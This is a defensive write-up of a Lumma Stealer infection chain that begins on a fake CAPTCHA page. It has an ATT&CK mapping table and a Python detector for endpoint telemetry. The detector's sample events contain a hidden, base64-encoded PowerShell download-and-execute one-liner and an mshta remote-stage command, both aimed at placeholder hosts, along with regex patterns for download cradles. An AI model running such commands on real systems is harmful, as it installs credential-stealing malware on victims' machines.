Context:
This scenario simulates a Lumma Stealer infection that begins on a fake CAPTCHA page. The user is bounced through attacker-controlled domains and instructed to paste a PowerShell command into the Windows Run dialog; that one-liner stages the Lumma payload through PowerShell and mshta.exe.
Once deployed, Lumma steals browser credentials, performs host discovery, and communicates with multiple HTTPS C2 endpoints. The kill chain covers every stage from initial access to exfiltration, together with the indicators and detection points observed during analysis.
MITRE ATT&CK Mapping
| Tactic | Technique ID | Technique Name | Context |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | Victim visits a compromised website that forces redirects toward attacker infrastructure. |
| Execution | T1204 | User Execution | User is tricked into running an obfuscated PowerShell command from the Windows Run dialog. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell one-liner downloads and executes remote second-stage payloads. |
| Defense Evasion / Execution | T1218.005 | System Binary Proxy Execution: Mshta | mshta.exe executes attacker-hosted HTA/JS content as part of the staging process. |
| Command and Control | T1105 | Ingress Tool Transfer | afc.zip and additional Lumma components are downloaded from attacker-controlled URLs. |
| Execution | T1059 | Command and Scripting Interpreter | AutoIt-based modules (deci.com) and other components are executed on the host. |
| Defense Evasion | T1027 | Obfuscated Files or Information | Payloads, scripts, and PowerShell commands are heavily obfuscated to avoid detection. |
| Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Lumma steals the Chrome/Edge credential SQLite databases (Login Data, Web Data). |
| Discovery | T1518.001 | Security Software Discovery | Lumma checks firewall profiles to assess the defensive posture of the host. |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | Lumma establishes encrypted HTTPS sessions with multiple C2 domains. |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Browser credentials and collected system data are exfiltrated via HTTPS POST requests. |
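The detection points implied by the mapping above (Run-dialog PowerShell with an encoded or download cradle, mshta.exe pulling remote content, firewall enumeration, and a non-browser process reading the Chrome/Edge credential databases) can be checked against endpoint telemetry. The script below is an added example, not code from the original page or from the referenced analysis. It assumes Sysmon-like field names (Image, ParentImage, CommandLine, TargetFilename), treats `netsh advfirewall show` as the firewall-profile check (an assumption; the page does not state the mechanism Lumma used), and runs over constructed sample events with placeholder hostnames.

```python
"""Added example: flag the stages of the fake-CAPTCHA -> PowerShell -> mshta
-> Lumma chain in endpoint telemetry. Event dicts use Sysmon-like field
names (Image, ParentImage, CommandLine, TargetFilename); the events
themselves are constructed for this example, not from the analysed case."""
import base64
import re

DOWNLOAD_CRADLE = re.compile(
    r"iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|net\.webclient|start-bitstransfer", re.I)
URL = re.compile(r"https?://", re.I)
# -e / -en / -enc / -EncodedCommand followed by a base64 blob
ENC_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
BROWSER_DB = re.compile(r"\\(login data|web data)$", re.I)
BROWSERS = {"chrome.exe", "msedge.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Append the UTF-16LE-decoded -EncodedCommand payload, if any, so the
    cradle patterns also match obfuscated one-liners."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} <decoded: {decoded}>"


def analyze(event: dict) -> list[tuple[str, str]]:
    """Return (ATT&CK technique ID, reason) pairs for one event."""
    findings = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))

    if event["EventType"] == "ProcessCreate":
        cmd = decode_encoded_command(event.get("CommandLine", ""))
        cradle = bool(DOWNLOAD_CRADLE.search(cmd) and URL.search(cmd))
        if image in ("powershell.exe", "pwsh.exe"):
            # The Run dialog spawns children of explorer.exe; an encoded or
            # downloading PowerShell there is the ClickFix tell.
            if parent == "explorer.exe" and (cradle or ENC_FLAG.search(cmd)):
                findings.append(("T1204", "PowerShell from Explorer with cradle or encoded command"))
            if cradle:
                findings.append(("T1059.001", "PowerShell download-and-execute cradle"))
        elif image == "mshta.exe" and URL.search(cmd):
            findings.append(("T1218.005", "mshta.exe fetching remote HTA/script content"))
        elif image == "netsh.exe" and re.search(r"advfirewall\s+show", cmd, re.I):
            # Assumption: firewall profile enumeration via netsh.
            findings.append(("T1518.001", "firewall profile enumeration"))
    elif event["EventType"] == "FileAccess":
        target = event.get("TargetFilename", "")
        if BROWSER_DB.search(target) and image not in BROWSERS:
            findings.append(("T1555.003", f"non-browser process {image} read {basename(target)}"))
    return findings


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Group findings by technique ID -> list of offending process images."""
    hits: dict[str, list[str]] = {}
    for ev in events:
        for tid, _reason in analyze(ev):
            hits.setdefault(tid, []).append(basename(ev.get("Image", "")))
    return hits


def sample_events() -> list[dict]:
    """Constructed telemetry mirroring the chain in the text (hostnames are placeholders)."""
    one_liner = "iex (iwr 'https://captcha.example.invalid/verify.txt' -UseBasicParsing)"
    enc = base64.b64encode(one_liner.encode("utf-16le")).decode()
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
         "Image": ps, "CommandLine": f"powershell -w hidden -enc {enc}"},
        {"EventType": "ProcessCreate", "ParentImage": ps,
         "Image": r"C:\Windows\System32\mshta.exe",
         "CommandLine": "mshta https://stage.example.invalid/stage.hta"},
        {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\System32\cmd.exe",
         "Image": r"C:\Windows\System32\netsh.exe",
         "CommandLine": "netsh advfirewall show allprofiles"},
        {"EventType": "FileAccess", "Image": r"C:\Users\victim\AppData\Local\Temp\deci.com",
         "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
        # Benign control: interactive PowerShell from Explorer with no cradle.
        {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
         "Image": ps, "CommandLine": "powershell Get-Process"},
    ]


if __name__ == "__main__":
    for tid, images in sorted(triage(sample_events()).items()):
        print(tid, images)
```

Decoding the `-EncodedCommand` blob before pattern matching is what makes the first event fire: the raw command line contains no URL or cradle keyword, only base64. The benign control (plain `powershell Get-Process` from Explorer) produces no finding, which is the false-positive boundary a parent-child rule on explorer.exe -> powershell.exe alone would not give you.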
References
Fake CAPTCHA led to LUMMA - https://www.nccgroup.com/research-blog/fake-captcha-led-to-lumma/